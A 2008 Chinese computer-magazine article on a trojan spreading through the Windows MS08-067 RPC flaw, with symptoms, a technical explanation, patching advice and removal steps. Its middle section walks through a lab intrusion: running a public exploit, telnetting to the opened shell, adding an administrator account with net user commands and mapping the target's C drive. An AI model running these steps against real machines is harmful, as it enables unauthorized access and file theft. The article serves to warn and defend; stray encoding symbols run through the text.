|
全程詳解 怕黑屏而關(guān)閉自動(dòng)更新更危險(xiǎn)
<轉(zhuǎn)載請(qǐng)注明出處 電腦報(bào)(www.)2008年第44期F版>
看了本文����,你會(huì)知道:
1. 現(xiàn)在網(wǎng)上“黑屏沖擊波”病毒正在快速傳播
2. 中毒后�,你的電腦會(huì)出現(xiàn)倒計(jì)時(shí)關(guān)機(jī)等癥狀
3. 它的首選目標(biāo)是為防范黑屏而關(guān)閉自動(dòng)更新的電腦
4. 它利用MS08-067漏洞進(jìn)行傳播
5. 黑客利用MS08-067批量溢出工具進(jìn)行瘋狂攻擊
6. 如何清除病毒解以及修補(bǔ)漏洞
在微軟推出黑屏計(jì)劃幾天后�����,網(wǎng)上出現(xiàn)了名為“黑屏沖擊波”的病毒(Win32.Troj.Unknown.z.397312)��,從它的命名中就知道跟黑屏有關(guān)��。沒錯(cuò)�����,如果你為了避免黑屏��,將系統(tǒng)的自動(dòng)升級(jí)功能關(guān)閉了����,沒有及時(shí)修改系統(tǒng)的安全補(bǔ)丁,那你就算它的目標(biāo)了�。
也許你要問:沖擊波是很老的病毒了,怎么可能還有效����?雖然都可以導(dǎo)致出現(xiàn)倒計(jì)時(shí)關(guān)機(jī)�,但此沖擊波病毒可不是2003年的沖擊波病毒����,它利用的是最新曝出
的MS08-067漏洞進(jìn)行感染的,如果你的電腦沒有打上相應(yīng)補(bǔ)丁����,該病毒就能發(fā)作。中了該病毒的電腦會(huì)有以下四個(gè)特征:第一�����,出現(xiàn)倒計(jì)時(shí)關(guān)機(jī)的提示框����。
第二,系統(tǒng)運(yùn)行越來越緩慢���。第三�����,電腦鼠標(biāo)被控制����。第四,各種賬號(hào)和密碼被盜��。
如果你的電腦出現(xiàn)以上特征��,那就非常不幸����,你中了“黑屏沖擊波
”病毒��。如果你沒有中該病毒��,也別先忙著慶幸��,你的電腦還沒有完全擺脫黑客的“魔手”��,知道為什么嗎�?因?yàn)閱栴}的關(guān)鍵是在MS08-067漏洞上,不用病
毒�����,黑客還可以用攻擊程序直接入侵���,一旦讓黑客成功入侵電腦���,你的賬號(hào)和密碼就會(huì)被盜�����。
目前相關(guān)的黑客工具正各大黑客網(wǎng)站上快速地傳播���,有不
是黑客利用這些工具大肆進(jìn)行破壞,危險(xiǎn)不言而喻了�。圖1就是某位黑客利用相關(guān)工具批量溢出的“成果”,一次就成功入侵的數(shù)十臺(tái)沒有打上補(bǔ)丁的電腦��,現(xiàn)在是
不是有種不寒而栗的感覺了���?那該漏洞又是怎么產(chǎn)生的�����?黑客又是如何利用該漏洞直接入侵的�?
被黑客攻擊的電腦
遠(yuǎn)程調(diào)用溢出是禍因
這次微軟曝出的MS08-067漏洞�,威脅性相當(dāng)巨大。黑客利用該漏洞,可以遠(yuǎn)程發(fā)起攻擊��,讓你的電腦時(shí)不時(shí)的就出現(xiàn)倒計(jì)時(shí)關(guān)機(jī)(如果你關(guān)閉了自動(dòng)更新)����,令人煩不勝煩。此外��,木馬也可以利用該漏洞進(jìn)行傳播�����,試圖盜竊用戶的各種賬號(hào)和密碼——這樣的病毒已經(jīng)出現(xiàn)了�。
該漏洞是因?yàn)镽PC協(xié)議存在溢出缺陷導(dǎo)致的����,這與當(dāng)年肆虐網(wǎng)絡(luò)的沖擊波病毒非常相似。遠(yuǎn)程過程調(diào)用(Remote Procedure
Call�����,RPC)是一個(gè)計(jì)算機(jī)通信協(xié)議�。該協(xié)議允許運(yùn)行于一臺(tái)計(jì)算機(jī)的程序調(diào)用另一臺(tái)計(jì)算機(jī)的子程序,而程序員無需額外地為這個(gè)交互作用編程�。
小知識(shí):有關(guān)RPC的想法至少可以追溯到1976年以“信使報(bào)”(Courier)的名義使用。RPC首次在UNIX平臺(tái)上普及的執(zhí)行工具程序是SUN
公司的RPC(現(xiàn)在叫ONC RPC)���。它被用作SUN的NFC的主要部件�。ONC RPC今天仍在服務(wù)器上被廣泛使用。
另一個(gè)早期UNIX平臺(tái)的工具是“阿波羅”計(jì)算機(jī)網(wǎng)絡(luò)計(jì)算系統(tǒng)(NCS)����,它很快就用做OSF的分布計(jì)算環(huán)境(DCE)中的DCE/RPC的基礎(chǔ),并補(bǔ)充
了DCOM��。
Windows的ConPathMacros函數(shù)中的wcscpy在拷貝含有[url=file://\..\]\..
\[/url]..的長字符串時(shí)出現(xiàn)溢出��。ConPathMacros函數(shù)中wcscpy執(zhí)行復(fù)制操作�����,正常的字符串復(fù)制后就向下繼續(xù)執(zhí)行了�����,黑客制作的
畸形的字wcscpy被調(diào)用時(shí)�,會(huì)被執(zhí)行兩次,這與就會(huì)超出程序的邊界��,導(dǎo)致溢出��,所以MS08-067漏洞出現(xiàn)了。
模擬入侵遠(yuǎn)程電腦C盤
MS08-067漏洞在微軟推出補(bǔ)丁后沒有多久�����,就有國外黑客組織公布了漏洞利用工具PoC版本�����,可能是開發(fā)過于匆忙���,這個(gè)程序本身存在瑕疵�,無法成功利用��,所以該工具沒有流傳開來����。
之后�,網(wǎng)上出現(xiàn)了可以成功網(wǎng)絡(luò)攻擊的Exp版本,這無疑將是沒有打補(bǔ)丁電腦的噩夢(mèng)�。而這場(chǎng)噩夢(mèng)究竟有多恐怖哪?接下來我們就為大家實(shí)戰(zhàn)演示MS08-067漏洞入侵的全部過程���。發(fā)動(dòng)進(jìn)攻主機(jī):Windows XP SP3�����,被攻擊目標(biāo)主機(jī):Windows Server 2003(IP地址:192.168.3.76)
第一步:首先準(zhǔn)備好MS08-067漏洞的Exp攻擊程序����,我們本次測(cè)試所使用的就是從互聯(lián)網(wǎng)公開渠道下載的Exp程序。程序下載后解壓縮放置到自己制定的文件夾中���。
準(zhǔn)備好攻擊測(cè)試程序后���,點(diǎn)擊開始菜單中的“控制面板”,然后雙擊打開“管理工具”中的“服務(wù)”選項(xiàng)�。在打開的“服務(wù)”窗口列表中,將
Server服務(wù)�����、Computer Browser服務(wù)��、Workstation服務(wù)全部啟動(dòng)���。如果不將這三項(xiàng)服務(wù)啟動(dòng)��,攻擊程序?qū)o法正常發(fā)動(dòng)攻擊�。
第二步:服務(wù)開啟完成后,依次點(diǎn)擊“開始菜單”中的“所有程序”����,在彈出的菜單列表中單擊“附件”中的“命令提示符”程序,點(diǎn)開之后進(jìn)入到
Exp程序所在目錄���。然后輸入攻擊指令���。攻擊指令相當(dāng)簡(jiǎn)單,只需要輸入Exp程序名稱���,然后輸入打算攻擊的目標(biāo)主機(jī)IP地址即可��。以我們的測(cè)試環(huán)境中的例
子為:“MS08067exp.exe 192.168.3.76”輸入后回車���,此時(shí)屏幕如果顯示:“SMB Connect OK!Maybe
Patched!”則表示Exp程序溢出成功。
Exp程序溢出成功
第三步:在進(jìn)攻主機(jī)中打開系統(tǒng)安全管理工具“Atools”���,然后點(diǎn)擊左方菜單“基本工具”中的“端口管理”,檢查本機(jī)系統(tǒng)中是否開啟了一個(gè)端口好為“840”的端口��。如果系統(tǒng)顯示已經(jīng)開啟�,則表示已經(jīng)成功的監(jiān)聽并連接到了被攻擊的目標(biāo)計(jì)算機(jī)��。
開啟監(jiān)聽端口
第四步:在確定成功溢出目標(biāo)主機(jī)并開啟監(jiān)聽端口之后�����,我們?cè)谶M(jìn)攻主機(jī)的CMD命令提示符窗口中輸入“Telnet 192.168.3.76
4444”回車之后��,就成功連接進(jìn)入到了被攻擊的目標(biāo)主機(jī)���。連接進(jìn)入目標(biāo)主機(jī)后,在CMD命令提示符窗口繼續(xù)輸入“net user antiy
test /add”命令��,此命令將會(huì)在目標(biāo)主機(jī)的系統(tǒng)中添加一個(gè)用戶名為antiy�����,密碼為test的用戶�。命令成功完成后,再次輸入“net
localgroup administrators antiy /add”命令���,此命令會(huì)將用戶名為antiy的用戶提升為系統(tǒng)管理員��。
添加管理員帳戶
第五步:在成功提升為管理員之后�����,繼續(xù)在CMD命令提示符窗口輸入“net share c$=C:/user:2”將目標(biāo)計(jì)算機(jī)的C盤共享����。然后輸入“net use
[url=file://\192.168.3.76\ipc$]\192.168.3.76\ipc$[/url] /user:antiy
test”和“net use x:[url=file://\192.168.3.76\c$]\192.168.3.76\c$[/url]”命令,將對(duì)方C盤映射共享���,此時(shí)你已經(jīng)成功
的入侵并可以隨意獲取對(duì)方系統(tǒng)盤中的文件了��。
打補(bǔ)丁堵漏洞
根據(jù)MS08-067的嚴(yán)重性和危害性����,建議廣大用戶特別是局域網(wǎng)用戶����,即時(shí)更新Windows操作系統(tǒng)的補(bǔ)丁。國內(nèi)部分盜版用戶由于受到
Windows黑屏事件影響�,可能已經(jīng)關(guān)閉了自動(dòng)升級(jí)補(bǔ)丁的功能,可以通過《360安全衛(wèi)士》等軟件更新補(bǔ)丁����。此外,還需要用殺毒軟件配合木馬查殺軟件
(例如AVG�����、《安天木馬防線》等)對(duì)自己的電腦進(jìn)行一次徹底的清查�����。
局域網(wǎng)管理員可以通過防火墻和路由設(shè)備阻斷TCP 139和445端口���,禁用Server和Computer Browser服務(wù)��,也可以通過Windows中的Internet連接防火墻���,并取消“例外”選項(xiàng)卡中“文件和打印機(jī)共享”上的復(fù)選框。
清除黑屏沖擊波病毒
如果你的電腦已經(jīng)中了利用MS08-067漏洞的“黑屏沖擊波”病毒�,請(qǐng)用以下方法清除病毒。
第一步:首先運(yùn)行安全工具WSysCheck(下載地址:http://down1.tech.sina.com.cn/download/down_contents/1186848000/36345.shtml)���,點(diǎn)擊“進(jìn)程管理”標(biāo)簽����,在進(jìn)程列表找到顯示為紫紅色的svchost.exe進(jìn)程����。選中進(jìn)程后,在窗口下方會(huì)看到一個(gè)名為sysmgr.dll的DLL文件��,選中它點(diǎn)擊右鍵選擇“卸載模塊”命令即可(圖5)。
圖5
第二步:接著點(diǎn)擊程序的“服務(wù)管理”標(biāo)簽����,從服務(wù)列表中找到紅色的sysmgr服務(wù)。點(diǎn)擊右鍵選擇“刪除選中的服務(wù)”命令����,清除該木馬的啟動(dòng)服務(wù),這樣該木馬就不能隨機(jī)啟動(dòng)了(圖6)����。
圖6
第三步:再點(diǎn)擊程序的“文件管理”標(biāo)簽后,在磁盤目錄中進(jìn)入System32目錄中的Wbem文件夾�,找到該木馬的服務(wù)端文件sysmgr.dll后,點(diǎn)擊右鍵選擇“直接刪除文件”命令����,將木馬從系統(tǒng)徹底清除(圖7)。
圖7
最后重新安裝殺毒軟件(例如《金山毒霸》����,下載地址:www.duba.net/download/index.shtml)并升級(jí)病毒庫到最新版本,再進(jìn)行全盤查殺�,將病毒殘留物徹底清除干凈。
|
